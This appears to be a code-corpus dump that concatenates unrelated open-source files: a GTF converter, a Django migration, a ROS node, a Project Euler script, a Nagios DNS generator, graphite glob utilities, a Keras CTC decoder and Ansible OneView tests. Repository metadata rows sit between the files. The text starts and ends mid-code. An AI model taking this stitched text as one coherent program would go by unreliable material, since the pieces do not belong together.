v['contig'], v['source'], v['CDS'][i][y][0], v['CDS'][i][y][1], v['strand'], current_phase, v['ids'][i], v['ids'][i]))
current_phase = (
current_phase - (int(v['CDS'][i][y][1]) - int(v['CDS'][i][y][0]) + 1)) % 3
if current_phase == 3:
current_phase = 0
def main(args):
# setup menu with argparse
parser = argparse.ArgumentParser(prog='stringtie2gff.py',
description='''Script to convert StringTie GTF file to GFF3.''',
epilog="""Written by Jon Palmer (2018) [email protected]""")
parser.add_argument('-i', '--input', required=True,
help='StringTie GTF file')
args = parser.parse_args(args)
Genes = lib.gtf2dict(args.input)
dict2gff3(Genes)
if __name__ == "__main__":
main(sys.argv[1:])
|
bsd-2-clause
| -5,736,459,926,717,889,000 | 49.341772 | 144 | 0.451848 | false | 3.25184 | false | false | false |
brianloveswords/webpagemaker
|
webpagemaker/api/migrations/0004_lowercase_short_url_ids.py
|
1
|
1316
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
NUMERALS = "3fldc4mzjyqr7bkug5vh0a68xpon9stew12i"
def rebase(num, numerals=NUMERALS):
base = len(numerals)
left_digits = num // base
if left_digits == 0:
return numerals[num % base]
else:
return rebase(left_digits, numerals) + numerals[num % base]
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
for page in orm.Page.objects.all():
page.short_url_id = rebase(page.id)
page.save()
def backwards(self, orm):
"Write your backwards methods here."
raise RuntimeError("Cannot go back.")
models = {
'api.page': {
'Meta': {'object_name': 'Page'},
'html': ('django.db.models.fields.TextField', [], {'max_length': '10000'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'original_url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'short_url_id': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'})
}
}
complete_apps = ['api']
symmetrical = True
|
mpl-2.0
| 162,472,665,847,516,580 | 31.9 | 126 | 0.587386 | false | 3.454068 | false | false | false |
EndPointCorp/lg_ros_nodes
|
lg_media/scripts/browser_player.py
|
1
|
1133
|
#!/usr/bin/env python3
import rospy
from lg_msg_defs.msg import AdhocMedias
from lg_media import DirectorMediaBridge
from interactivespaces_msgs.msg import GenericMessage
from lg_common.helpers import handle_initial_state
from lg_common.helpers import run_with_influx_exception_handler
DEFAULT_VIEWPORT = 'center'
MEDIA_TYPE = 'browser_video'
VIDEOSYNC_URL = 'http://lg-head/lg_sv/webapps/videosync'
NODE_NAME = 'lg_media_service_browser_player'
def main():
rospy.init_node(NODE_NAME, anonymous=True)
viewport_name = rospy.get_param('~viewport', DEFAULT_VIEWPORT)
topic_name = '/media_service/browser/%s' % viewport_name
adhoc_media_publisher = rospy.Publisher(topic_name, AdhocMedias,
queue_size=3)
director_bridge = DirectorMediaBridge(adhoc_media_publisher, viewport_name, MEDIA_TYPE)
rospy.Subscriber('/director/scene', GenericMessage,
director_bridge.translate_director)
handle_initial_state(director_bridge.translate_director)
rospy.spin()
if __name__ == '__main__':
run_with_influx_exception_handler(main, NODE_NAME)
|
apache-2.0
| 6,909,703,112,144,728,000 | 34.40625 | 91 | 0.713151 | false | 3.392216 | false | false | false |
paulmcquad/projecteuler
|
0-100/problem31.py
|
1
|
1448
|
#http://users.softlab.ntua.gr/~ttsiod/euler31.html
#!/usr/bin/env python
# the 8 coins correspond to 8 columns
coins = [1, 2, 5, 10, 20, 50, 100, 200]
TARGET=200
matrix = {}
for y in xrange(0, TARGET+1):
# There is only one way to form a target sum N
# via 1-cent coins: use N 1-cents!
matrix[y, 0] = 1 # equivalent to matrix[(y,0)]=1
for y in xrange(0, TARGET+1):
print y, ":", 1,
for x in xrange(1, len(coins)):
matrix[y, x] = 0
# Is the target big enough to accomodate coins[x]?
if y>=coins[x]:
# If yes, then the number of ways to form
# the target sum are obtained via:
#
# (a) the number of ways to form this target
# using ONLY coins less than column x
# i.e. matrix[y][x-1]
matrix[y, x] += matrix[y, x-1]
# plus
# (b) the number of ways to form this target
# when USING the coin of column x
# which means for a remainder of y-coins[x]
# i.e. matrix[y-coins[x]][x]
matrix[y, x] += matrix[y-coins[x], x]
else:
# if the target is not big enough to allow
# usage of the coin in column x,
# then just copy the number of ways from the
# column to the left (i.e. with smaller coins)
matrix[y, x] = matrix[y, x-1]
print matrix[y, x],
print
|
gpl-3.0
| -9,069,959,849,210,606,000 | 31.909091 | 59 | 0.529006 | false | 3.290909 | false | false | false |
savoirfairelinux/quebec-monitoring
|
scripts/dns.py
|
1
|
2091
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
DNS = {
# Cogeco Cable (Trois-rivieres)
'cogeco.ca': ['205.151.69.200','205.151.68.200'],
# Videotron.CA
'videotron.ca': ['205.151.222.250', '205.151.222.251'],
# Colbanet
'colba.net': ['216.252.64.75', '216.252.64.76'],
}
template_host = (
"""
define host {
use generic-host
host_name %(host)s
address %(host)s
alias %(host)s
check_command check_dummy!0!OK
}
""")
template_service = (
"""
define service {
use generic-service
host_name %(host)s
check_command check_dig_service!%(ip)s!www.gouv.qc.ca
display_name %(host)s (%(ip)s)
service_description %(ip)s
servicegroups dns
labels order_%(order)d
}
""")
business_rule = (
"""
define host {
use generic-host
host_name dns
alias dns
check_command check_dummy!0!OK
}
define service {
use template_bprule
host_name dns
service_description dns
display_name DNS
notes Principaux serveurs DNS.
check_command bp_rule!%(all_dns)s
business_rule_output_template $(x)$
servicegroups main
icon_image fa-gears
}
""")
def main():
all_dns = []
order = 1
for host, ips in DNS.iteritems():
print template_host % {'host': host}
for ip in ips:
print template_service % {'host': host, 'ip': ip, 'order': order}
all_dns.append('%(host)s,%(ip)s' % {'host': host, 'ip': ip})
order += 1
print business_rule % {'all_dns': '&'.join(all_dns)}
if __name__ == '__main__':
main()
|
agpl-3.0
| -6,103,445,619,368,963,000 | 27.256757 | 77 | 0.432329 | false | 3.901119 | false | false | false |
dpanth3r/biggraphite
|
biggraphite/glob_utils.py
|
1
|
15872
|
#!/usr/bin/env python
# Copyright 2016 Criteo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Globbing utility module."""
from enum import Enum
import itertools
import re
# http://graphite.readthedocs.io/en/latest/render_api.html#paths-and-wildcards
_GRAPHITE_GLOB_RE = re.compile(r"^[^*?{}\[\]]+$")
def _is_graphite_glob(metric_component):
"""Return whether a metric component is a Graphite glob."""
return _GRAPHITE_GLOB_RE.match(metric_component) is None
def _is_valid_glob(glob):
"""Check whether a glob pattern is valid.
It does so by making sure it has no dots (path separator) inside groups,
and that the grouping braces are not mismatched. This helps doing useless
(or worse, wrong) work on queries.
Args:
glob: Graphite glob pattern.
Returns:
True if the glob is valid.
"""
depth = 0
for c in glob:
if c == '{':
depth += 1
elif c == '}':
depth -= 1
if depth < 0:
# Mismatched braces
return False
elif c == '.':
if depth > 0:
# Component separator in the middle of a group
return False
# We should have exited all groups at the end
return depth == 0
class TokenType(Enum):
"""Represents atomic types used to tokenize Graphite globbing patterns."""
PATH_SEPARATOR = 0
LITERAL = 1
WILD_CHAR = 2
WILD_SEQUENCE = 3
WILD_PATH = 4
CHAR_SELECT_BEGIN = 5
CHAR_SELECT_NEGATED_BEGIN = 6
CHAR_SELECT_RANGE_DASH = 7
CHAR_SELECT_END = 8
EXPR_SELECT_BEGIN = 9
EXPR_SELECT_SEPARATOR = 10
EXPR_SELECT_END = 11
def tokenize(glob):
"""Convert a glob expression to a stream of tokens.
Tokens have the form (type: TokenType, data: String).
Args:
glob: Graphite glob pattern.
Returns:
Iterator on a token stream.
"""
SPECIAL_CHARS = '.?*[-]{,}'
is_escaped = False
is_char_select = False
tmp = ""
token = None
i = -1
while i+1 < len(glob):
i += 1
c = glob[i]
# Literal handling
if is_escaped:
tmp += c
is_escaped = False
continue
elif c == '\\':
is_escaped = True
continue
elif c not in SPECIAL_CHARS or (c == '-' and not is_char_select):
if token and token != TokenType.LITERAL:
yield token, None
token, tmp = TokenType.LITERAL, ""
token = TokenType.LITERAL
tmp += c
continue
elif token:
yield token, tmp
token, tmp = None, ""
# Special chars handling
if c == '.':
yield TokenType.PATH_SEPARATOR, ""
elif c == '?':
yield TokenType.WILD_CHAR, ""
elif c == '*':
# Look-ahead for wild path (globstar)
if i+1 < len(glob) and glob[i+1] == '*':
i += 1
yield TokenType.WILD_PATH, ""
else:
yield TokenType.WILD_SEQUENCE, ""
elif c == '[':
is_char_select = True
# Look-ahead for negated selector (not in)
if i+1 < len(glob) and glob[i+1] == '!':
i += 1
yield TokenType.CHAR_SELECT_NEGATED_BEGIN, ""
else:
yield TokenType.CHAR_SELECT_BEGIN, ""
elif c == '-':
yield TokenType.CHAR_SELECT_RANGE_DASH, ""
elif c == ']':
is_char_select = False
yield TokenType.CHAR_SELECT_END, ""
elif c == '{':
yield TokenType.EXPR_SELECT_BEGIN, ""
elif c == ',':
yield TokenType.EXPR_SELECT_SEPARATOR, ""
elif c == '}':
yield TokenType.EXPR_SELECT_END, ""
else:
raise Exception("Unexpected character '%s'" % c)
# Do not forget trailing token, if any
if token:
yield token, tmp
def _glob_to_regex(glob):
"""Convert a Graphite globbing pattern into a regular expression.
This function does not check for glob validity, if you want usable regexes
then you must check _is_valid_glob() first.
Uses _tokenize() to obtain a token stream, then does simple substitution
from token type and data to equivalent regular expression.
It handles * as being anything except a dot.
It returns a regex that only matches whole strings (i.e. ^regex$).
Args:
glob: Valid Graphite glob pattern.
Returns:
Regex corresponding to the provided glob.
"""
ans = ""
for token, data in tokenize(glob):
if token == TokenType.PATH_SEPARATOR:
ans += re.escape('.')
elif token == TokenType.LITERAL:
ans += re.escape(data)
elif token == TokenType.WILD_CHAR:
ans += "."
elif token == TokenType.WILD_SEQUENCE:
ans += "[^.]*"
elif token == TokenType.WILD_PATH:
ans += ".*"
elif token == TokenType.CHAR_SELECT_BEGIN:
ans += "["
elif token == TokenType.CHAR_SELECT_NEGATED_BEGIN:
ans += "[^"
elif token == TokenType.CHAR_SELECT_RANGE_DASH:
ans += "-"
elif token == TokenType.CHAR_SELECT_END:
ans += "]"
elif token == TokenType.EXPR_SELECT_BEGIN:
ans += "("
elif token == TokenType.EXPR_SELECT_SEPARATOR:
ans += "|"
elif token == TokenType.EXPR_SELECT_END:
ans += ")"
else:
raise Exception("Unexpected token type '%s' with data '%s'" % (token, data))
return '^' + ans + '$'
def glob(metric_names, glob_pattern):
"""Pre-filter metric names according to a glob expression.
Uses the dot-count and the litteral components of the glob to filter
guaranteed non-matching values out, but may still require post-filtering.
Args:
metric_names: List of metric names to be filtered.
glob_pattern: Glob pattern.
Returns:
List of metric names that may be matched by the provided glob.
"""
glob_components = glob_pattern.split(".")
globstar = None
prefix_literals = []
suffix_literals = []
for (index, component) in enumerate(glob_components):
if component == "**":
globstar = index
elif globstar:
# Indexed relative to the end because globstar length is arbitrary
suffix_literals.append((len(glob_components) - index, component))
elif not _is_graphite_glob(component):
prefix_literals.append((index, component))
def maybe_matched_prefilter(metric):
metric_components = metric.split(".")
if globstar:
if len(metric_components) < len(glob_components):
return False
elif len(metric_components) != len(glob_components):
return False
for (index, value) in itertools.chain(suffix_literals, prefix_literals):
if metric_components[index] != value:
return False
return True
return filter(maybe_matched_prefilter, metric_names)
def graphite_glob(accessor, graphite_glob, metrics=True, directories=True):
"""Get metrics and directories matching a Graphite glob.
Args:
accessor: BigGraphite accessor
graphite_glob: Graphite glob expression
metrics: True if metrics should be fetched
directories: True if directories should be fetched
Returns:
A tuple:
First element: sorted list of Cassandra metrics matched by the glob.
Second element: sorted list of Cassandra directories matched by the glob.
"""
if not _is_valid_glob(graphite_glob):
# TODO(d.forest): should we instead raise an exception?
return ([], [])
glob_re = re.compile(_glob_to_regex(graphite_glob))
if metrics:
metrics = accessor.glob_metric_names(graphite_glob)
metrics = filter(glob_re.match, metrics)
else:
metrics = []
if directories:
directories = accessor.glob_directory_names(graphite_glob)
directories = filter(glob_re.match, directories)
else:
directories = []
return (metrics, directories)
class GlobExpression:
"""Base class for glob expressions."""
def __repr__(self):
return self.__class__.__name__
def __eq__(self, other):
return self.__class__ == other.__class__
class GlobExpressionWithValues(GlobExpression):
"""Base class for glob expressions that have values."""
def __init__(self, values):
"""Take a list of values, and stores the sorted unique values."""
self.values = sorted(set(values))
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, self.values)
def __eq__(self, other):
return (GlobExpression.__eq__(self, other) and
self.values == other.values)
class Globstar(GlobExpression):
"""Represents a globstar wildcard."""
pass
class AnyChar(GlobExpression):
"""Represents any single character."""
pass
class AnySequence(GlobExpression):
"""Represents any sequence of 0 or more characters."""
pass
class SequenceIn(GlobExpressionWithValues):
"""Represents a choice between different character sequences."""
pass
class GraphiteGlobParser:
"""Utility class for parsing graphite glob expressions."""
# TODO(d.forest): upgrade to new tokenizer here
# TODO(d.forest): after upgrade, try to improve Cassandra query generation
def __init__(self):
"""Build a parser, fill in default values."""
self._reset('')
def _commit_sequence(self):
if len(self._sequence) > 0:
self._component.append(self._sequence)
self._sequence = ''
def _commit_component(self):
self._commit_sequence()
if len(self._component) > 0:
self._parsed.append(self._component)
self._component = []
def _parse_char_wildcard(self):
"""Parse single character wildcard."""
self._commit_sequence()
self._component.append(AnyChar())
def _parse_wildcard(self, i, n):
"""Parse multi-character wildcard, and globstar."""
self._commit_sequence()
# Look-ahead for potential globstar
if i < n and self._glob[i] == '*':
self._commit_component()
self._parsed.append(Globstar())
i += 1
else:
self._component.append(AnySequence())
return i
def _find_char_selector_end(self, i, n):
"""Find where a character selector expression ends."""
j = i
if j < n and self._glob[j] == '!':
j += 1
if j < n and self._glob[j] == ']':
j += 1
j = self._glob.find(']', j)
if j == -1:
return n
return j
def _parse_char_selector(self, i, n):
"""Parse character selector, with support for negation and ranges.
For simplicity (and because it does not seem useful at the moment) we
will not be generating the possible values or parsing the ranges, but
outputting AnyChar on valid char selector expressions.
"""
j = self._find_char_selector_end(i, n)
if j < n:
# +1 to skip closing bracket
i = j + 1
self._commit_sequence()
self._component.append(AnyChar())
else:
# Reached end of string: unbalanced bracket
self._sequence += '['
return i
def _parse_sequence_selector(self, i, n):
"""Parse character sequence selector, with support for nesting.
For simplicity, we will be outputting AnySequence in situations where
values contain a character selector.
"""
result = self._parse_sequence_selector_values(i, n)
if result:
has_char_selector, i, values = result
if not has_char_selector and len(values) == 1:
self._sequence += values[0]
else:
if has_char_selector:
seq = AnySequence()
else:
seq = SequenceIn(values)
self._commit_sequence()
self._component.append(seq)
else:
self._sequence += '{'
return i
def _parse_sequence_selector_values(self, i, n):
has_char_selector = False
values = []
curr = []
tmp = ''
j = i
c = ''
while j < n and c != '}':
c = self._glob[j]
j += 1
# Parse sub-expression then combine values with prefixes.
if c == '{':
if tmp != '':
curr.append(tmp)
tmp = ''
result = self._parse_sequence_selector_values(j, n)
if not result:
return None
has_charsel, j, subvalues = result
has_char_selector = has_char_selector or has_charsel
curr = [prefix + x for prefix in curr for x in subvalues]
# End of current element, combine values with suffix.
elif c == ',' or c == '}':
if len(curr) > 0:
values += [x + tmp for x in curr]
else:
values.append(tmp)
curr = []
tmp = ''
# Simplified handling of char selector
elif c == '[':
# XXX(d.forest): We could keep track of depth and just make sure
# the selector expression is well-formed instead
# of continuing to parse everything.
# This is open for later improvement.
k = self._find_char_selector_end(j, n)
if k < n:
has_char_selector = True
j = k + 1
else:
tmp += '['
# Reject dots inside selectors
elif c == '.':
return None
# Append char to the current value.
else:
tmp += c
# We have reached the end without finding a closing brace: the braces
# are unbalanced, expression cannot be parsed as a sequence selector.
if j == n and c != '}':
return None
return has_char_selector, j, values + curr
def _reset(self, glob):
self._glob = glob
self._parsed = []
self._component = []
self._sequence = ''
def parse(self, glob):
"""Parse a graphite glob expression into simple components."""
self._reset(glob)
i = 0
n = len(self._glob)
while i < n:
c = self._glob[i]
i += 1
if c == '?':
self._parse_char_wildcard()
elif c == '*':
i = self._parse_wildcard(i, n)
elif c == '[':
i = self._parse_char_selector(i, n)
elif c == '{':
i = self._parse_sequence_selector(i, n)
elif c == '.':
self._commit_component()
else:
self._sequence += c
self._commit_component()
return self._parsed
|
apache-2.0
| -4,000,647,928,094,152,000 | 29.75969 | 88 | 0.550718 | false | 4.336612 | false | false | false |
AlexGidiotis/Multimodal-Gesture-Recognition-with-LSTMs-and-CTC
|
multimodal_fusion/sequence_decoding.py
|
1
|
3585
|
import pandas as pd
import numpy as np
from operator import itemgetter
from itertools import groupby
from keras.preprocessing import sequence
from keras.models import Sequential
from keras.models import model_from_json
from keras import backend as K
from keras.optimizers import RMSprop
import keras.callbacks
from keras.layers import Input, Lambda
from keras.models import Model
import itertools
from sklearn import preprocessing
from data_generator import DataGenerator
from losses import ctc_lambda_func
def decode_batch(pred_out,f_list):
"""
"""
# Map gesture codes to classes.
map_gest = {0:"oov", 1:"VA", 2:"VQ", 3:"PF", 4:"FU", 5:"CP", 6:"CV",
7:"DC", 8:"SP", 9:"CN", 10:"FN", 11:"OK", 12:"CF", 13:"BS",
14:"PR", 15:"NU", 16:"FM", 17:"TT", 18:"BN", 19:"MC",
20:"ST", 21:"sil"}
# These files are problematic during decoding.
ignore_list = [228,298,299,300,303,304,334,343,373,375]
# Write the output to .mlf
of = open('final_ctc_recout.mlf', 'w')
of.write('#!MLF!#\n')
out = pred_out
ret = []
for j in range(out.shape[0]):
out_prob = list(np.max(out[j, 2:],1))
out_best = list(np.argmax(out[j, 2:],1))
# Filter the probabilities to get the most confident predictions.
for p,s in zip(out_prob,out_best):
if p < 0.5:
out_prob.remove(p)
out_best.remove(s)
out_best = [k for k, g in itertools.groupby(out_best)]
outstr = [map_gest[i] for i in out_best]
ret.append(outstr)
f_num = f_list[j]
if int(f_num) in ignore_list:
continue
fileNum = str(format(f_num, '05'))
fileName = 'Sample'+fileNum
of.write('"*/%s.rec"\n' %fileName)
for cl in outstr:
of.write('%s\n' %cl)
of.write('.\n')
of.close()
return ret
if __name__ == '__main__':
minibatch_size = 2
maxlen = 1900
nb_classes = 22
nb_epoch = 100
numfeats_speech = 39
numfeats_skeletal = 20
K.set_learning_phase(0)
dataset = raw_input('select train or val: ')
data_gen = DataGenerator(minibatch_size=minibatch_size,
numfeats_speech=numfeats_speech,
numfeats_skeletal=numfeats_skeletal,
maxlen=maxlen,
nb_classes=nb_classes,
dataset=dataset)
input_shape_a = (maxlen, numfeats_speech)
input_shape_s = (maxlen, numfeats_skeletal)
input_data_a = Input(name='the_input_audio', shape=input_shape_a, dtype='float32')
input_data_s = Input(name='the_input_skeletal', shape=input_shape_s, dtype='float32')
json_file = open('multimodal_ctc_blstm_model.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
loaded_model.load_weights("multimodal_ctc_lstm_weights_best.h5")
print("Loaded model from disk")
y_pred = loaded_model.get_layer('softmax').output
labels = Input(name='the_labels', shape=[data_gen.absolute_max_sequence_len], dtype='float32')
input_length = Input(name='input_length', shape=[1], dtype='int64')
label_length = Input(name='label_length', shape=[1], dtype='int64')
loss_out = Lambda(ctc_lambda_func, output_shape=(1,), name="ctc")([y_pred, labels, input_length, label_length])
rmsprop = RMSprop(lr=0.001, clipnorm=5)
# the loss calc occurs elsewhere, so use a dummy lambda func for the loss
loaded_model.compile(loss={'ctc': lambda y_true, y_pred: y_pred}, optimizer=rmsprop)
pred_model = Model(inputs=loaded_model.input,
outputs=loaded_model.get_layer('softmax').output)
predictions = pred_model.predict_generator(generator=data_gen.next_val(),
steps=data_gen.get_size(train=False)/minibatch_size,
verbose=1)
f_list = data_gen.get_file_list(train=False)
decoded_res = decode_batch(predictions, f_list)
|
mit
| 6,923,407,496,692,858,000 | 27.228346 | 112 | 0.68954 | false | 2.787714 | false | false | false |
HewlettPackard/oneview-ansible
|
test/test_oneview_scope.py
|
1
|
11066
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
###
# Copyright (2016-2020) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
import copy
import mock
import pytest
from hpe_test_utils import OneViewBaseTest
from oneview_module_loader import ScopeModule
FAKE_MSG_ERROR = 'Fake message error'
RESOURCE = dict(name='ScopeName', uri='/rest/scopes/id')
RESOURCE_UPDATED = dict(name='ScopeNameRenamed', uri='/rest/scopes/id')
RESOURCE_ASSIGNMENTS = dict(name='ScopeName',
addedResourceUris=['/rest/resource/id-1', '/rest/resource/id-4'])
PARAMS_FOR_PRESENT = dict(
config='config.json',
state='present',
data=dict(name='ScopeName')
)
PARAMS_WITH_CHANGES = dict(
config='config.json',
state='present',
data=dict(name='ScopeName',
newName='ScopeNameRenamed')
)
PARAMS_WITH_CHANGES_HAVING_RESOURCES_1 = dict(
config='config.json',
state='present',
data=dict(name='ScopeName',
addedResourceUris=['/rest/resource/id-1', '/rest/resource/id-2'],
removedResourceUris=['/rest/resource/id-3'])
)
PARAMS_WITH_CHANGES_HAVING_RESOURCES_2 = dict(
config='config.json',
state='present',
data=dict(name='ScopeName',
addedResourceUris=['/rest/resource/id-1', '/rest/resource/id-2'],
removedResourceUris=['/rest/resource/id-2'])
)
PARAMS_FOR_ABSENT = dict(
config='config.json',
state='absent',
data=dict(name='ScopeName')
)
PARAMS_RESOURCE_ASSIGNMENTS = dict(
config='config.json',
state='resource_assignments_updated',
data=dict(name='ScopeName',
resourceAssignments=dict(addedResourceUris=['/rest/resource/id-1', '/rest/resource/id-2'],
removedResourceUris=['/rest/resource/id-3']))
)
PARAMS_NO_RESOURCE_ASSIGNMENTS = dict(
config='config.json',
state='resource_assignments_updated',
data=dict(name='ScopeName',
resourceAssignments=dict(addedResourceUris=None,
removedResourceUris=None))
)
@pytest.mark.resource(TestScopeModule='scopes')
class TestScopeModule(OneViewBaseTest):
def test_should_create_new_scope_when_not_found(self):
self.resource.get_by_name.return_value = None
self.resource.create.return_value = self.resource
self.resource.data = PARAMS_FOR_PRESENT
self.mock_ansible_module.params = copy.deepcopy(PARAMS_FOR_PRESENT)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_CREATED,
ansible_facts=dict(scope=PARAMS_FOR_PRESENT)
)
def test_should_not_update_when_data_is_equals(self):
response_data = PARAMS_FOR_PRESENT['data']
self.resource.data = response_data
self.mock_ansible_module.params = PARAMS_FOR_PRESENT
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
msg=ScopeModule.MSG_ALREADY_PRESENT,
ansible_facts=dict(scope=response_data)
)
def test_should_not_update_when_no_new_add_remove_resources(self):
self.resource.get_by_name.return_value = self.resource
current_data = copy.deepcopy(PARAMS_WITH_CHANGES_HAVING_RESOURCES_1['data'])
self.resource.data = current_data
self.mock_ansible_module.params = PARAMS_WITH_CHANGES_HAVING_RESOURCES_1
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_UPDATED,
ansible_facts=dict(scope=current_data)
)
def test_should_update_when_new_remove_resources(self):
self.resource.get_by_name.return_value = self.resource
current_data = copy.deepcopy(PARAMS_WITH_CHANGES_HAVING_RESOURCES_2['data'])
self.resource.data = current_data
self.mock_ansible_module.params = PARAMS_WITH_CHANGES_HAVING_RESOURCES_2
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_UPDATED,
ansible_facts=dict(scope=current_data)
)
def test_should_update_when_new_add_resources(self):
self.resource.get_by_name.return_value = self.resource
current_data = copy.deepcopy(RESOURCE_ASSIGNMENTS)
self.resource.data = current_data
self.mock_ansible_module.params = PARAMS_WITH_CHANGES_HAVING_RESOURCES_1
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_UPDATED,
ansible_facts=dict(scope=current_data)
)
def test_should_update_when_data_has_changes(self):
data_merged = PARAMS_FOR_PRESENT.copy()
data_merged['name'] = 'ScopeNameRenamed'
self.resource.data = PARAMS_FOR_PRESENT
self.mock_ansible_module.params = PARAMS_WITH_CHANGES
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_UPDATED,
ansible_facts=dict(scope=PARAMS_FOR_PRESENT)
)
def test_should_remove_scope_when_found(self):
self.resource.get_by_name.return_value = self.resource
self.resource.data = PARAMS_FOR_PRESENT
self.mock_ansible_module.params = copy.deepcopy(PARAMS_FOR_ABSENT)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_DELETED
)
def test_should_not_delete_when_scope_not_found(self):
self.resource.get_by_name.return_value = None
self.mock_ansible_module.params = copy.deepcopy(PARAMS_FOR_ABSENT)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
msg=ScopeModule.MSG_ALREADY_ABSENT
)
def test_should_fail_resource_assignments_when_scope_not_found(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = None
self.mock_ansible_module.params = copy.deepcopy(PARAMS_RESOURCE_ASSIGNMENTS)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
failed=True,
changed=False,
msg=ScopeModule.MSG_RESOURCE_NOT_FOUND
)
def test_should_not_update_resource_assignments_in_api300(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = self.resource
resource_data = PARAMS_NO_RESOURCE_ASSIGNMENTS.copy()
self.resource.data = resource_data
self.resource.update_resource_assignments.return_value = self.resource
self.mock_ansible_module.params = copy.deepcopy(PARAMS_NO_RESOURCE_ASSIGNMENTS)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(scope=PARAMS_NO_RESOURCE_ASSIGNMENTS),
msg=ScopeModule.MSG_RESOURCE_ASSIGNMENTS_NOT_UPDATED
)
def test_should_add_and_remove_resource_assignments_in_api300(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = self.resource
resource_data = PARAMS_RESOURCE_ASSIGNMENTS.copy()
self.resource.data = resource_data
patch_return = resource_data.copy()
patch_return['scopeUris'] = ['test']
patch_return_obj = self.resource.copy()
patch_return_obj.data = patch_return
self.resource.patch.return_value = patch_return_obj
self.mock_ansible_module.params = copy.deepcopy(PARAMS_RESOURCE_ASSIGNMENTS)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
ansible_facts=dict(scope=PARAMS_RESOURCE_ASSIGNMENTS),
msg=ScopeModule.MSG_RESOURCE_ASSIGNMENTS_UPDATED
)
def test_should_update_name_in_api300(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = self.resource
PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_NAME = dict(
config='config.json',
state='resource_assignments_updated',
data=dict(name='ScopeName',
resourceAssignments=dict(name='TestScope'))
)
resource_data = PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_NAME.copy()
self.resource.data = resource_data
patch_return = resource_data.copy()
patch_return['scopeUris'] = ['test']
patch_return_obj = self.resource.copy()
patch_return_obj.data = patch_return
self.resource.patch.return_value = patch_return_obj
self.mock_ansible_module.params = copy.deepcopy(PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_NAME)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
ansible_facts=dict(scope=PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_NAME),
msg=ScopeModule.MSG_RESOURCE_ASSIGNMENTS_UPDATED
)
def test_should_update_description_in_api300(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = self.resource
PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_DESCRIPTION = dict(
config='config.json',
state='resource_assignments_updated',
data=dict(name='ScopeName',
resourceAssignments=dict(description='Test'))
)
resource_data = PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_DESCRIPTION.copy()
self.resource.data = resource_data
patch_return = resource_data.copy()
patch_return['scopeUris'] = ['test']
patch_return_obj = self.resource.copy()
patch_return_obj.data = patch_return
self.resource.patch.return_value = patch_return_obj
self.mock_ansible_module.params = copy.deepcopy(PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_DESCRIPTION)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
ansible_facts=dict(scope=PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_DESCRIPTION),
msg=ScopeModule.MSG_RESOURCE_ASSIGNMENTS_UPDATED
)
if __name__ == '__main__':
pytest.main([__file__])
|
apache-2.0
| -3,200,483,235,945,231,000 | 34.928571 | 104 | 0.653895 | false | 3.698529 | true | false | false |
rtucker-mozilla/mozilla_inventory
|
core/utils.py
|
1
|
6521
|
from django.db.models import Q
from django.core.exceptions import ValidationError
import ipaddr
import smtplib
from email.mime.text import MIMEText
from settings.local import people_who_need_to_know_about_failures
from settings.local import inventorys_email
# http://dev.mysql.com/doc/refman/5.0/en/miscellaneous-functions.html
# Prevent this case http://people.mozilla.com/~juber/public/t1_t2_scenario.txt
def locked_function(lock_name, timeout=10):
def decorator(f):
